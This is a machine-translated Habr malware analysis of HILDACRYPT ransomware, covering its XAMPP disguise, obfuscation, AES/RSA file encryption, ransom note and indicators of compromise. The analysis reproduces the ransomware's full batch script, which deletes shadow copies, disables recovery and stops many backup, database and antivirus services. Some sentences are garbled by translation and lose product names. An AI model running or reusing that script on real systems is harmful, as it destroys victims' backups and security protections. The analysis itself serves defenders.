Zdravo, Habr! Još jednom govorimo o najnovijim verzijama malvera iz kategorije Ransomware. HILDACRYPT je novi ransomware, član porodice Hilda otkriven u augustu 2019. godine, nazvan po Netflix crtiću koji je korišten za distribuciju softvera. Danas se upoznajemo sa tehničkim karakteristikama ovog ažuriranog ransomware virusa.
U prvoj verziji Hilda ransomware-a, link do jednog objavljenog na Youtube-u crtana serija je bila sadržana u pismu za otkupninu. HILDACRYPT se maskira kao legitimni XAMPP instalater, Apache distribucija koja se lako instalira i koja uključuje MariaDB, PHP i Perl. U isto vrijeme, cryptolocker ima drugačije ime datoteke - xamp. Osim toga, ransomware fajl nema elektronski potpis.
Statička analiza
Ransomware se nalazi u PE32 .NET datoteci napisanoj za Microsoft. WindowsNjegova veličina je 135.168 bajtova. I glavni programski kod i kod defendera napisani su u C#. Prema datumu i vremenskoj oznaci kompajliranja, binarna datoteka je kreirana 14. septembra 2019. godine.
Prema Detect It Easy, ransomware se arhivira koristeći Confuser i ConfuserEx, ali ovi obfuskatori su isti kao i prije, samo je ConfuserEx nasljednik Confusera, tako da su njihovi potpisi koda slični.
HILDACRYPT je zaista upakovan u ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor napada
Najvjerovatnije, ransomware je otkriven na jednoj od web stranica za programiranje, maskiran kao legitiman XAMPP program.
Može se vidjeti cijeli lanac infekcije .
Obfuscation
Nizovi ransomwarea pohranjeni su u šifriranom obliku. Kada se pokrene, HILDACRYPT ih dešifruje koristeći Base64 i AES-256-CBC.
postavljanje
Prije svega, ransomware kreira mapu u %AppDataRoaming% u kojoj se nasumično generira parametar GUID (Globalno jedinstveni identifikator). Dodavanjem bat datoteke na ovu lokaciju, ransomware virus ga pokreće pomoću cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
Zatim počinje izvršavati skupnu skriptu za onemogućavanje sistemskih funkcija ili usluga.
Skripta sadrži dugu listu naredbi koje uništavaju sjene kopije, onemogućuju SQL server, backup i antivirusna rješenja.
Na primjer, neuspješno pokušava zaustaviti usluge Acronis Backup. Osim toga, napada backup sisteme i antivirusna rješenja sljedećih proizvođača: Veeam, Sophos, Kaspersky, McAfee i drugi.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Jednom kada su gore spomenuti servisi i procesi onemogućeni, kriptolokator prikuplja informacije o svim pokrenutim procesima koristeći naredbu liste zadataka kako bi osigurao da su sve potrebne usluge isključene.
lista zadataka v/fo csv
Ova komanda prikazuje detaljnu listu pokrenutih procesa, čiji su elementi odvojeni znakom “,”.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Nakon ove provjere, ransomware započinje proces šifriranja.
Encryption
Šifrovanje fajla
HILDACRYPT prolazi kroz sve pronađene sadržaje tvrdih diskova, osim mapa Recycle.Bin i Reference AssembliesMicrosoft. Potonji sadrži kritične dll, pdb, itd. datoteke za .Net aplikacije koje mogu utjecati na rad ransomwarea. Za traženje datoteka koje će biti šifrirane, koristi se sljedeća lista ekstenzija:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware koristi AES-256-CBC algoritam za šifriranje korisničkih datoteka. Veličina ključa je 256 bita, a veličina vektora inicijalizacije (IV) je 16 bajtova.
Na sljedećem snimku ekrana, vrijednosti byte_2 i byte_1 dobijene su nasumično pomoću GetBytes().
Ključ
IN AND
Šifrovani fajl ima ekstenziju HCY!.. Ovo je primer šifrovane datoteke. Gore navedeni ključ i IV su kreirani za ovu datoteku.
Šifriranje ključem
Kriptolocker pohranjuje generirani AES ključ u šifriranu datoteku. Prvi dio šifrirane datoteke ima zaglavlje koje sadrži podatke kao što su HILDACRYPT, KEY, IV, FileLen u XML formatu i izgleda ovako:
AES i IV šifrovanje ključem se vrši pomoću RSA-2048, a kodiranje pomoću Base64. RSA javni ključ je pohranjen u tijelu kriptolokatora u jednom od šifriranih nizova u XML formatu.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA javni ključ se koristi za šifriranje AES ključa datoteke. RSA javni ključ je kodiran Base64 i sastoji se od modula i javnog eksponenta od 65537. Za dešifriranje je potreban RSA privatni ključ, koji napadač ima.
Nakon RSA enkripcije, AES ključ se kodira korištenjem Base64 pohranjenog u šifriranoj datoteci.
Poruka otkupnine
Kada se šifriranje završi, HILDACRYPT upisuje html datoteku u mapu u kojoj je šifrirao datoteke. Obavijest o ransomware-u sadrži dvije adrese e-pošte na kojima žrtva može kontaktirati napadača.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
Obavijest o iznudi također sadrži liniju "No loli is safe;)" - referenca na anime i manga likove sa izgledom djevojčica zabranjenih u Japanu.
zaključak
HILDACRYPT, nova porodica ransomware-a, objavila je novu verziju. Model šifriranja sprečava žrtvu da dešifruje datoteke koje je šifrovao ransomware. Cryptolocker koristi metode aktivne zaštite kako bi onemogućio usluge zaštite koje se odnose na sigurnosne sisteme i antivirusna rješenja. Autor HILDACRYPT-a je obožavatelj animirane serije Hilda, prikazane na Netflixu, čiji se link ka trejleru nalazio u pismu za otkup prethodne verzije programa.
Normalno, и može zaštititi vaš računar od HILDACRYPT ransomwarea, a provajderi imaju mogućnost da zaštite svoje kupce sa . Zaštita je osigurana činjenicom da ova rješenja uključuju uključuje ne samo rezervnu kopiju, već i naš integrisani sigurnosni sistem - Pokreće se modelom mašinskog učenja i zasnovana na heuristici ponašanja, tehnologija koja je sposobna da se suprotstavi pretnji ransomware-a kao nijedan drugi.
Indikatori kompromisa
Ekstenzija datoteke HCY!
HILDACRYPTReadMe.html
xamp.exe sa jednim slovom "p" i bez digitalnog potpisa
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
izvor: www.habr.com
